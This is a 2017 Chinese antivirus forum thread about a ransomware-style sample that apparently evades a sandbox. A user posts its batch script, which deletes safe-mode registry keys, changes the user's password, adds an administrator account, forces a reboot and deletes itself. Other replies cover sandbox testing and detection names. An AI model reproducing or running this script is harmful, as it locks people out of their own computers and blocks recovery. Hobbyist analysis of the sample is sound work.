敲竹杠样本（作者机智绕过哈勃分析）

B100D1E55

@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ReportBootOk /t REG_SZ /d 0 /f
reg delete "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_CURRENT_USER\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /f
net user %username% shenmian
net user ShenMian /add
net user ShenMian shenmian
net user administrators ShenMian /add
shutdown -r -f -t 1 -c "ShenMian"
del /s /f /q %0

…………
额，所以是怎么绕过的

wu5920

B100D1E55 发表于 2017-2-8 09:51
@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000 ...

HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\  这里   果然很机智

弄错了  
影子好像没法重启，如果这个样本需要的话，就没法测试了。
不过，不重启直接运行样本，comodo全部允许的话，是没被锁的。

学雷锋做人

68221281 发表于 2017-2-8 10:27
comodo 关了沙箱双击，全部允许。没发现加密的文件。
现在调用cmd.exe的程序，往往都会被重点关照吧，感觉 ...

这是勒索？看清楚是什么

学雷锋做人

B100D1E55 发表于 2017-2-8 09:51
@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000 ...

你居然没看出来？慢慢看

https://habo.qq.com/file/showdet ... pk=ADYGbl1rB28IOVs0

ysj963

欧阳宣 发表于 2017-2-8 07:14
ALYac        Spyware.33940        20170207
AVG        Win32/DH{OQk2gRY?}        20170207
Ad-Aware        Spyware.33940        20170207

这里面唯独没有NOD32

longan

先下来试试

B100D1E55

学雷锋做人 发表于 2017-2-8 10:40
你居然没看出来？慢慢看

https://habo.qq.com/file/showdetail?md5=c7f618896db9cfda77248be25ae09f88 ...

我不是哈勃高级会员没法看详情，刚刚提交了申请不知道要多久通过。。。

longan

密码多少来着。。。

学雷锋做人

B100D1E55 发表于 2017-2-8 10:56
我不是哈勃高级会员没法看详情，刚刚提交了申请不知道要多久通过。。。

哈哈，我以前申请当天就批了